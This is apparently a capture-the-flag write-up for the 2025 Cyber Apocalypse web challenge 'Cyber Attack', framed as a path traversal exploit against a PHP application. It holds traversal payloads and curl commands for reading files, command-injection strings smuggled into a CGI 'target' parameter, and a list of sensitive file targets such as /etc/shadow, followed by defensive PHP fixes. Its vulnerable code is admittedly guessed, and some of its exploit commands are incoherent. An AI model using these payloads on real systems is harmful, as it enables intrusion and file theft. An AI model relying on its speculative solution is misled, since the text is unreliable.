2025 Cyber Apocalypse: Web Cyber Attack

Challenge Information

Attribute	Details
Event	2025 Cyber Apocalypse
Category	Web
Challenge	Cyber Attack

The Cyber Attack challenge presents “Eldoria Cyber Attack”, a themed web application that allows users to simulate attacks on domains and IPs. The application contains a critical path traversal vulnerability that allows attackers to read arbitrary files from the server filesystem, including the flag.

Analysis

Application Overview

Frontend (src/index.php):

The application features:

Lore text encouraging attacks against resistance forces
Name input field
Domain or IP input field
Two attack buttons: “Attack a Domain” and “Attack an IP”
Results display area

<!DOCTYPE HTML>
<html lang="en">
<head>
    <title>Eldoria Cyber Attack</title>
    <!-- RPGUI styling -->
</head>
<body>
    <div class="rpgui-content">
        <div class="rpgui-container framed">
            <h1>Welcome to Eldoria Cyber Attack</h1>
            <label for="user-name">Enter Your Name:</label>
            <input type="text" id="user-name" name="user-name" placeholder="Name" required>
            <label for="target">Enter Domain or IP:</label>
            <input type="text" id="target" name="target" placeholder="Domain or IP" required>

            <button class="rpgui-button golden" id="attack-domain">
                <p>Attack a Domain</p>
            </button>
            <button class="rpgui-button golden" id="attack-ip">
                <p>Attack an IP</p>
            </button>
        </div>
    </div>
</body>
</html>

Key Vulnerability: Path Traversal

Vulnerable Parameter: The page parameter in attack requests

Attack Endpoint: index.php?page=<path>

Vulnerability: The application constructs file paths without proper validation, allowing directory traversal sequences (../) to escape the intended directory.

PHP Implementation Weakness

// VULNERABLE CODE (likely implementation)
if (isset($_GET['page'])) {
    $page = $_GET['page'];
    // No validation - allows traversal!
    include $_SERVER['DOCUMENT_ROOT'] . "/" . $page;
}

Solution

Step 1: Identify Vulnerable Parameter

The attack buttons redirect to CGI endpoints:

window.location.href = `cgi-bin/attack-domain?target=${target}&name=${name}`;
window.location.href = `cgi-bin/attack-ip?target=${target}&name=${name}`;

Test for path traversal in the target parameter or other endpoints.

Step 2: Craft Path Traversal Payload

Use directory traversal sequences to reach the flag file:

page=../../../../var/www/html/flag.txt

Or in a complete request:

GET /index.php?page=../../../../var/www/html/flag.txt HTTP/1.1
Host: target.com

Step 3: Exploit with curl

Execute the path traversal attack:

curl "http://127.0.0.1/index.php?page=../../../../var/www/html/flag.txt"

Step 4: Alternative Exploitation

If direct inclusion fails, chain with command execution:

# URL-encoded payload
curl "http://127.0.0.1/index.php?page=../../../../var/www/html/flag.txt%20-o%20/tmp/f%20&&%20cat%20/tmp/f"

Or using the attack endpoint:

curl "http://127.0.0.1/cgi-bin/attack-domain?target=example.com;curl%20http://127.0.0.1/index.php?page=../../../../var/www/html/flag.txt%20-o%20/tmp/f%20&&%20cat%20/tmp/f"

Step 5: Extract Flag

Once the vulnerability is exploited, the flag file contents are displayed or can be read from the response.

Vulnerability Details

Root Cause

The application fails to validate or sanitize the page parameter, allowing:

Directory traversal (../)
Absolute path access (/etc/passwd)
Remote file inclusion (if allow_url_include is enabled)

Attack Vector

Input:  ../../../../var/www/html/flag.txt
Process: $path . "index.php" + "../../../../var/www/html/flag.txt"
Result: Includes /var/www/html/flag.txt (traverses out of intended directory)

Impact

Confidentiality: Read arbitrary files (configuration, credentials, source code)
Integrity: Potentially write files if function allows
Availability: DoS through resource exhaustion

Secure Implementation

Whitelist Approach:

<?php
$allowed_pages = ['home', 'about', 'contact'];
$page = $_GET['page'] ?? 'home';

if (!in_array($page, $allowed_pages)) {
    die("Invalid page");
}

include "./pages/{$page}.php";
?>

Input Validation:

<?php
$page = $_GET['page'] ?? '';

// Remove dangerous sequences
$page = str_replace('../', '', $page);
$page = str_replace('..\\', '', $page);

// Allow only alphanumeric and underscores
if (!preg_match('/^[a-zA-Z0-9_]+$/', $page)) {
    die("Invalid page");
}

include "./pages/{$page}.php";
?>

Proper Path Handling:

<?php
$base_dir = realpath('./pages/');
$requested_file = realpath('./pages/' . $_GET['page']);

// Verify requested file is within base directory
if (strpos($requested_file, $base_dir) !== 0) {
    die("Access denied");
}

include $requested_file;
?>

Common LFI Payloads

# Linux system files
/etc/passwd
/etc/shadow
/proc/self/environ
/proc/version

# Web server files
/var/www/html/index.php
/var/www/html/config.php
/etc/apache2/apache2.conf

# Application files
../../config.php
../../../../database.yml
../../../secrets.txt

Key Takeaways

Input Validation is Critical: Never trust user input for file operations
Whitelist Over Blacklist: Allow specific files rather than blocking dangerous ones
Use realpath(): Resolve paths to detect traversal attempts
Principle of Least Privilege: Web server should have minimal file access
Separation of Concerns: Keep uploaded/user content separate from application code
Security Headers: Use X-Frame-Options, Content-Security-Policy, etc.
Error Handling: Don’t expose file paths in error messages

Tools Used

curl: Command-line HTTP client for exploitation
Burp Suite: Web proxy for intercepting and modifying requests
OWASP ZAP: Automated vulnerability scanning
Browser DevTools: Network inspection and debugging

References

OWASP Path Traversal: https://owasp.org/www-community/attacks/Path_Traversal
CWE-22: https://cwe.mitre.org/data/definitions/22.html
PHP Security: https://www.php.net/manual/en/security.php
LFI Prevention: https://cheatsheetseries.owasp.org/cheatsheets/Path_Traversal_Cheat_Sheet.html